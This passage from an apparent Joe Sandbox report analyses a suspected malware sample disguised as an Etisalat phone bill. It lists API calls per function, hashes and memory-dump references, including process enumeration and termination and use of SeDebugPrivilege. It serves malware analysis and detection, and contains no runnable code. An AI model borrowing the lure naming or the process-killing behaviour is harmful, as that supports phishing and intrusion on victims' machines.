                                      • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00B9C5EC
                                      • DestroyIcon.USER32(?), ref: 00B9C5FB
                                        • Part of subcall function 00BEA71E: DeleteObject.GDI32(00000000), ref: 00BEA757
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                      • String ID:
                                      • API String ID: 2819616528-0
                                      • Opcode ID: 2a281d5a534d7e5c0cc199f08c83f576ca0329e563451085d4354a870da973c3
                                      • Instruction ID: 579ec9167977173d6d1b313d7653d59b5b5c33878566bfc7552df68056ee5138
                                      • Opcode Fuzzy Hash: 2a281d5a534d7e5c0cc199f08c83f576ca0329e563451085d4354a870da973c3
                                      • Instruction Fuzzy Hash: 6D516B70600605AFEF24DF24CC85FAA3BF5EB58350F1045A8F906976A0DB74ED90DB60
                                      Function 00BB8E03 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00BB8A84,00000B00,?,?), ref: 00BB8E0C
                                      • HeapAlloc.KERNEL32(00000000,?,00BB8A84,00000B00,?,?), ref: 00BB8E13
                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00BB8A84,00000B00,?,?), ref: 00BB8E28
                                      • GetCurrentProcess.KERNEL32(?,00000000,?,00BB8A84,00000B00,?,?), ref: 00BB8E30
                                      • DuplicateHandle.KERNEL32(00000000,?,00BB8A84,00000B00,?,?), ref: 00BB8E33
                                      • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00BB8A84,00000B00,?,?), ref: 00BB8E43
                                      • GetCurrentProcess.KERNEL32(00BB8A84,00000000,?,00BB8A84,00000B00,?,?), ref: 00BB8E4B
                                      • DuplicateHandle.KERNEL32(00000000,?,00BB8A84,00000B00,?,?), ref: 00BB8E4E
                                      • CreateThread.KERNEL32(00000000,00000000,00BB8E74,00000000,00000000,00000000), ref: 00BB8E68
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                      • String ID:
                                      • API String ID: 1957940570-0
                                      • Opcode ID: 2aa96bd3a369d90d5168d51b1eb8eef86e5acdb5d1f70bfdf0733c98509285c3
                                      • Instruction ID: 4f30f4aa27324e5c181ac305b33d91c01bec69207498a555e857b759bda91eed
                                      • Opcode Fuzzy Hash: 2aa96bd3a369d90d5168d51b1eb8eef86e5acdb5d1f70bfdf0733c98509285c3
                                      • Instruction Fuzzy Hash: 7101BBB5240349FFEB10ABA5DC8DF6B3BACEB89711F018521FA05DF1A1CA709800CB21
                                      Function 00BD9428 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Variant$ClearInit$_memset
                                      • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                      • API String ID: 2862541840-625585964
                                      • Opcode ID: 47be27aa39374ecce1c78cc824a728ebba5d9ca8556d4609efb80fb26214d959
                                      • Instruction ID: b1238a8175e03a2f797b0d4919d02f2eea7188a60c79b4d6caed466929c02874
                                      • Opcode Fuzzy Hash: 47be27aa39374ecce1c78cc824a728ebba5d9ca8556d4609efb80fb26214d959
                                      • Instruction Fuzzy Hash: BF919E71A00215ABDF24DFA5D884FAEBBF8EF45714F1081AAF515AB280E7709945CFA0
                                      Function 00BD9A72 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00BB7652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00BB758C,80070057,?,?,?,00BB799D), ref: 00BB766F
                                        • Part of subcall function 00BB7652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00BB758C,80070057,?,?), ref: 00BB768A
                                        • Part of subcall function 00BB7652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00BB758C,80070057,?,?), ref: 00BB7698
                                        • Part of subcall function 00BB7652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00BB758C,80070057,?), ref: 00BB76A8
                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00BD9B1B
                                      • _memset.LIBCMT ref: 00BD9B28
                                      • _memset.LIBCMT ref: 00BD9C6B
                                      • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00BD9C97
                                      • CoTaskMemFree.OLE32(?), ref: 00BD9CA2
                                      Strings
                                      • NULL Pointer assignment, xrefs: 00BD9CF0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                      • String ID: NULL Pointer assignment
                                      • API String ID: 1300414916-2785691316
                                      • Opcode ID: 3d78c59cdefc9712ed5318156bfc2643f354198f9074a2004faddd14cbe130bc
                                      • Instruction ID: e2a79cdeb63b7177f5eb5a48589bda9c28752a610f609f7883a2bb4f10b27982
                                      • Opcode Fuzzy Hash: 3d78c59cdefc9712ed5318156bfc2643f354198f9074a2004faddd14cbe130bc
                                      • Instruction Fuzzy Hash: 97910971D00219ABDF10DFA5DC85ADEBBF9EF08710F2041AAF519A7291EB715A44CFA0
                                      Function 00BE6FEF Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00BE7093
                                      • SendMessageW.USER32(?,00001036,00000000,?), ref: 00BE70A7
                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00BE70C1
                                      • _wcscat.LIBCMT ref: 00BE711C
                                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 00BE7133
                                      • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00BE7161
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: MessageSend$Window_wcscat
                                      • String ID: SysListView32
                                      • API String ID: 307300125-78025650
                                      • Opcode ID: 7a6517041e916ba772289832a100cad8d5e3bb37959e39d52b4792ab66e08525
                                      • Instruction ID: 5fa86c7b253c0f38da9a2e0543edb7310a12cedae68c8f73c02a55042629dc9d
                                      • Opcode Fuzzy Hash: 7a6517041e916ba772289832a100cad8d5e3bb37959e39d52b4792ab66e08525
                                      • Instruction Fuzzy Hash: 8141C370944389AFEB219F64CC85BEE77E8EF08350F1004AAF544E7292DB719D84CB60
                                      Function 00BDEC47 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00BC3E91: CreateToolhelp32Snapshot.KERNEL32 ref: 00BC3EB6
                                        • Part of subcall function 00BC3E91: Process32FirstW.KERNEL32(00000000,?), ref: 00BC3EC4
                                        • Part of subcall function 00BC3E91: CloseHandle.KERNEL32(00000000), ref: 00BC3F8E
                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00BDECB8
                                      • GetLastError.KERNEL32 ref: 00BDECCB
                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00BDECFA
                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 00BDED77
                                      • GetLastError.KERNEL32(00000000), ref: 00BDED82
                                      • CloseHandle.KERNEL32(00000000), ref: 00BDEDB7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                      • String ID: SeDebugPrivilege
                                      • API String ID: 2533919879-2896544425
                                      • Opcode ID: 33c41996d09f47128217b4c496e8d7b451077cb42dd8701cd35bf164d5ce7a76
                                      • Instruction ID: d6c5e24394ef4345a74368f12b21eed63439d4a20897ff8cf1ba41195ceb8872
                                      • Opcode Fuzzy Hash: 33c41996d09f47128217b4c496e8d7b451077cb42dd8701cd35bf164d5ce7a76
                                      • Instruction Fuzzy Hash: 914158712002019FDB14EF24C895F79B7E5AF84714F0884A9F9569F2D2DFB9A804CB96
                                      Function 00BC3226 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadIconW.USER32(00000000,00007F03), ref: 00BC32C5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: IconLoad
                                      • String ID: blank$info$question$stop$warning
                                      • API String ID: 2457776203-404129466
                                      • Opcode ID: 0126390206f313073ec780d19677de715da50e9ea0a1847b9ea75ae279b89266
                                      • Instruction ID: 016667cb5edfbcea588770331746259b06452c8826429f338686c6dd48934db6
                                      • Opcode Fuzzy Hash: 0126390206f313073ec780d19677de715da50e9ea0a1847b9ea75ae279b89266
                                      • Instruction Fuzzy Hash: 4411EB31209346BAAB016A54DC82EAAB3DCDF1AF70F6040AEF5046E181D6B55B4056A5
                                      Function 00BC4534 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00BC454E
                                      • LoadStringW.USER32(00000000), ref: 00BC4555
                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00BC456B
                                      • LoadStringW.USER32(00000000), ref: 00BC4572
                                      • _wprintf.LIBCMT ref: 00BC4598
                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00BC45B6
                                      Strings
                                      • %s (%d) : ==> %s: %s %s, xrefs: 00BC4593
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: HandleLoadModuleString$Message_wprintf
                                      • String ID: %s (%d) : ==> %s: %s %s
                                      • API String ID: 3648134473-3128320259
                                      • Opcode ID: a63f6b1727e373abe6576f2b0b0ff3b369bf1048731d0c3672337c10a420890c
                                      • Instruction ID: a80af907f6b66b7c9584050bbf09d376dc2a8932d8d571e1886ceaea37d8ee30
                                      • Opcode Fuzzy Hash: a63f6b1727e373abe6576f2b0b0ff3b369bf1048731d0c3672337c10a420890c
                                      • Instruction Fuzzy Hash: 38014FF6900249BFE720A7A0DD89EF677ACDB08701F0005A5BB46E7051EA749F858B71
                                      Function 00BED74C Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00B62612: GetWindowLongW.USER32(?,000000EB), ref: 00B62623
                                      • GetSystemMetrics.USER32(0000000F), ref: 00BED78A
                                      • GetSystemMetrics.USER32(0000000F), ref: 00BED7AA
                                      • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00BED9E5
                                      • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00BEDA03
                                      • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00BEDA24
                                      • ShowWindow.USER32(00000003,00000000), ref: 00BEDA43
                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00BEDA68
                                      • DefDlgProcW.USER32(?,00000005,?,?), ref: 00BEDA8B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                      • String ID:
                                      • API String ID: 1211466189-0
                                      • Opcode ID: 38332d53af87c38493bfbfddf086e718b2da165107e937c7f124cf72b1d06d2f
                                      • Instruction ID: 4fceafb3420e217cda7f58a29273b273ec22c823e5175727a377108963bbb0ff
                                      • Opcode Fuzzy Hash: 38332d53af87c38493bfbfddf086e718b2da165107e937c7f124cf72b1d06d2f
                                      • Instruction Fuzzy Hash: 74B188356002A5ABDF14CF6AC9C57BD7BF1FF04701F0881A9ED489B295DBB4AA50CB60
                                      Function 00B62A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                                      Download Yara Rule
                                      APIs
                                      • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00B9C417,00000004,00000000,00000000,00000000), ref: 00B62ACF
                                      • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00B9C417,00000004,00000000,00000000,00000000,000000FF), ref: 00B62B17
                                      • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00B9C417,00000004,00000000,00000000,00000000), ref: 00B9C46A
                                      • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00B9C417,00000004,00000000,00000000,00000000), ref: 00B9C4D6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: ShowWindow
                                      • String ID:
                                      • API String ID: 1268545403-0
                                      • Opcode ID: 793f7fd6d2da2d89c56bdcd0e6b61b37f66dabc07300984ddf5b0d38e444fba6
                                      • Instruction ID: e37ce2e9c3b77ecb5f6d84945e091e44a93fea13a252cbe713016a0e729fb6e0
                                      • Opcode Fuzzy Hash: 793f7fd6d2da2d89c56bdcd0e6b61b37f66dabc07300984ddf5b0d38e444fba6
                                      • Instruction Fuzzy Hash: 6F41B831714FC09AEB358B689CD8B7A7BD2EF45310F1889EDE18787661C6BD9841E710
                                      Function 00BC7368 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 00BC737F
                                        • Part of subcall function 00B80FF6: std::exception::exception.LIBCMT ref: 00B8102C
                                        • Part of subcall function 00B80FF6: __CxxThrowException@8.LIBCMT ref: 00B81041
                                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00BC73B6
                                      • EnterCriticalSection.KERNEL32(?), ref: 00BC73D2
                                      • _memmove.LIBCMT ref: 00BC7420
                                      • _memmove.LIBCMT ref: 00BC743D
                                      • LeaveCriticalSection.KERNEL32(?), ref: 00BC744C
                                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00BC7461
                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 00BC7480
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                      • String ID:
                                      • API String ID: 256516436-0
                                      • Opcode ID: 96d55d7d72ac0269368a826db6bbdcefd70b3698814235e7b911fde5328ed06c
                                      • Instruction ID: 21852d23a7b8115a3256aa4b612f22ce8277a018d7514e0334fdc74167d03a42
                                      • Opcode Fuzzy Hash: 96d55d7d72ac0269368a826db6bbdcefd70b3698814235e7b911fde5328ed06c
                                      • Instruction Fuzzy Hash: 3A317031904245EBCF10EF54DC85EAE7BB8EF45710B1481A9F904AB256DF309A15CBA1
                                      Function 00BE6442 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • DeleteObject.GDI32(00000000), ref: 00BE645A
                                      • GetDC.USER32(00000000), ref: 00BE6462
                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00BE646D
                                      • ReleaseDC.USER32(00000000,00000000), ref: 00BE6479
                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00BE64B5
                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00BE64C6
                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00BE9299,?,?,000000FF,00000000,?,000000FF,?), ref: 00BE6500
                                      • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00BE6520
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                      • String ID:
                                      • API String ID: 3864802216-0
                                      • Opcode ID: eac0c2024acbd48af71d9f557a0359de5f0925484fba7300df2701c94a79242f
                                      • Instruction ID: 4555448f250c56a9461499fafee46e902b879f2054f3cf1cb648987194583887
                                      • Opcode Fuzzy Hash: eac0c2024acbd48af71d9f557a0359de5f0925484fba7300df2701c94a79242f
                                      • Instruction Fuzzy Hash: EC315A72201294AFEB118F51CC8AFBA3BA9EF19761F0440A5FE089E291DB759941CB64
                                      Function 00BBC072 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: _memcmp
                                      • String ID:
                                      • API String ID: 2931989736-0
                                      • Opcode ID: c92b98dcdb07b4669118f462c97dae79d46eda5e6722464888a69329216bb802
                                      • Instruction ID: a07ae2ceb792cbf449847b3ddcb186ab21e01b4f4a60e3f8d0350659606aed5f
                                      • Opcode Fuzzy Hash: c92b98dcdb07b4669118f462c97dae79d46eda5e6722464888a69329216bb802
                                      • Instruction Fuzzy Hash: 6F218071642209BB9614F6299D82FFF2BDCEE10394B4440A0FE05A72A2F7D1DE16C2A5
                                      Function 00BCED8E Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00B69997: __itow.LIBCMT ref: 00B699C2
                                        • Part of subcall function 00B69997: __swprintf.LIBCMT ref: 00B69A0C
                                        • Part of subcall function 00B7FEC6: _wcscpy.LIBCMT ref: 00B7FEE9
                                      • _wcstok.LIBCMT ref: 00BCEEFF
                                      • _wcscpy.LIBCMT ref: 00BCEF8E
                                      • _memset.LIBCMT ref: 00BCEFC1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                      • String ID: X
                                      • API String ID: 774024439-3081909835
                                      • Opcode ID: c236a1aa0b26c5d30df5867b8918ad9661780c348a97c5098944f55a3e0a85ac
                                      • Instruction ID: a12f945a32b9e2e428bae443ede0e65c9351d45ec67428cec8a2eb227f4fd175
                                      • Opcode Fuzzy Hash: c236a1aa0b26c5d30df5867b8918ad9661780c348a97c5098944f55a3e0a85ac
                                      • Instruction Fuzzy Hash: 3CC17C71508301DFC724EF24C891EAAB7E5EF85314F0449ADF9999B2A2DB34ED45CB82
